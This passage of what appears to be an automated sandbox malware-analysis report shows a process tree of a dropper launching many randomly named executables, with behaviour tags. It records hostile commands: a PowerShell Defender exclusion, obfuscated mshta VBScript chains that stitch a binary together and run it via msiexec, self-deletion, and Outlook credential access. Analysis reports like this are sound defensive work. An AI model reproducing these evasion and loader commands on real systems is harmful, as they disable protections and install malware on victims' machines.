                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                  PID:4272
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\5filMT5kfDzK8WAhvifyRO_l.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\5filMT5kfDzK8WAhvifyRO_l.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                  PID:1068
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\LarO0kSDQ2Xj0AYrVxbpuqoT.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\LarO0kSDQ2Xj0AYrVxbpuqoT.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                  PID:3836
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\8PNXo0ntWz32h9tjvqntyBLl.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\8PNXo0ntWz32h9tjvqntyBLl.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                  PID:3264
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\ukXz8TSqBtMjOhVIe2nJ7bbA.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\ukXz8TSqBtMjOhVIe2nJ7bbA.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                  PID:4444
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\Y5fbjgvMYHJoNhlnmkM9zdFK.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\Y5fbjgvMYHJoNhlnmkM9zdFK.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:1420
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:7296
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:3180
                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\2O4xWVGdHdXwkUYyygSv29gr.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\2O4xWVGdHdXwkUYyygSv29gr.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                    PID:2496
                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:4968
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\nDOmqSM8CgSpzcp5906e9Kix.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\nDOmqSM8CgSpzcp5906e9Kix.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:860
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\bWVzLfChSZxoBfQCBSZ3ZaIM.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\bWVzLfChSZxoBfQCBSZ3ZaIM.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                      PID:1404
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\vFMvWfTtWT7J5NgwnwnbxBh2.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\vFMvWfTtWT7J5NgwnwnbxBh2.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                      PID:4384
                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\vFMvWfTtWT7J5NgwnwnbxBh2.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\vFMvWfTtWT7J5NgwnwnbxBh2.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:5724
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\czQxOGnjsdvbfvu0uEGn7UpJ.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\czQxOGnjsdvbfvu0uEGn7UpJ.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                      PID:4744
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\N68ZTvKgagaFN8_iQEs5ydym.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\N68ZTvKgagaFN8_iQEs5ydym.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:2988
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 660
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:996
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 680
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5256
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 684
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:2144
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 664
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:6452
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 1128
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:4544
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 1100
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:6180
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 1200
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:6664
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 1260
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:2708
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 1252
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5340
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\0Tp6kZwhIFvoYg6KlJURqs4i.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\0Tp6kZwhIFvoYg6KlJURqs4i.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                      PID:2312
                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\0Tp6kZwhIFvoYg6KlJURqs4i.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\0Tp6kZwhIFvoYg6KlJURqs4i.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                        PID:5616
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\IyZtQ9tdUvPJhb_ehVfXZBGO.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\IyZtQ9tdUvPJhb_ehVfXZBGO.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                      PID:5088
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\iazcZ2P6Yvt6lhMJTD8rLAzV.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\iazcZ2P6Yvt6lhMJTD8rLAzV.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                      PID:2372
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\h0ykwlywUSww7m1XOMcalO6G.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\h0ykwlywUSww7m1XOMcalO6G.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Accesses Microsoft Outlook accounts
                                                                                                                                                                                                                      • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                                      • outlook_office_path
                                                                                                                                                                                                                      • outlook_win_path
                                                                                                                                                                                                                      PID:4720
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\h0ykwlywUSww7m1XOMcalO6G.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:8588
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                            PID:9136
                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\nERvzlcwwNXs59zD6X_YzBrl.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\nERvzlcwwNXs59zD6X_YzBrl.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Windows security modification
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                        • System policy modification
                                                                                                                                                                                                                        PID:5356
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2131832a-b218-4dc4-a282-c8ae8115aa2e\AdvancedRun.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\2131832a-b218-4dc4-a282-c8ae8115aa2e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2131832a-b218-4dc4-a282-c8ae8115aa2e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:6772
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2131832a-b218-4dc4-a282-c8ae8115aa2e\AdvancedRun.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\2131832a-b218-4dc4-a282-c8ae8115aa2e\AdvancedRun.exe" /SpecialRun 4101d8 6772
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:7136
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\nERvzlcwwNXs59zD6X_YzBrl.exe" -Force
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:4896
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\nERvzlcwwNXs59zD6X_YzBrl.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\nERvzlcwwNXs59zD6X_YzBrl.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:7136
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\nERvzlcwwNXs59zD6X_YzBrl.exe" -Force
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:6776
                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:4500
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\YKePTovufe5yUDhe4Y8VpZ5c.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\YKePTovufe5yUDhe4Y8VpZ5c.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5644
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\YKePTovufe5yUDhe4Y8VpZ5c.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\YKePTovufe5yUDhe4Y8VpZ5c.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:1392
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\YKePTovufe5yUDhe4Y8VpZ5c.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\YKePTovufe5yUDhe4Y8VpZ5c.exe" ) do taskkill -iM "%~NXI" -f
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:3772
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE
                                                                                                                                                                                                                                            ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                              PID:3180
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:4884
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                      PID:6240
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBScripT: clOse ( cREaTeObJECT ( "wscRIPt.SHELL" ). rUN ( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0 , trUE ) )
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:5988
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l
                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                          PID:7080
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                              PID:5804
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                PID:6536
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                msiexec.exe /Y ..\bjUC.l
                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:7428
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          taskkill -iM "YKePTovufe5yUDhe4Y8VpZ5c.exe" -f
                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:6440
                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\7QCkeokvldt289gH0PcWEZhr.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\7QCkeokvldt289gH0PcWEZhr.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    • Accesses Microsoft Outlook accounts
                                                                                                                                                                                                                                                    • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                                                                    PID:5136
                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\arGRIgruuHxQg7eC_a9SnHtU.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\arGRIgruuHxQg7eC_a9SnHtU.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:512
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3846477.scr
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3846477.scr" /S
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:6892
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3907635.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3907635.scr" /S
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:6256
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1238132.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1238132.scr" /S
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:7140
                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:2324
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2215331.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2215331.scr" /S
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                          PID:6216
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7205738.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7205738.scr" /S
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:6512
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                      PID:912
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon206d48916f93c5.exe
                                                                                                                                                                                                                                                        Mon206d48916f93c5.exe
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                        PID:2104
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4637112.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4637112.scr" /S
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:4672
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8711478.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8711478.scr" /S
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:3016
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4113992.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4113992.scr" /S
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:3548
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6399527.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6399527.scr" /S
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:1932
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:1240
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                        PID:528
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                          Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                          PID:1988
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:1504
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                            Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:3640
                                                                                                                                                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                    PID:1932
                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                      PID:5896
                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Process spawned unexpected child process
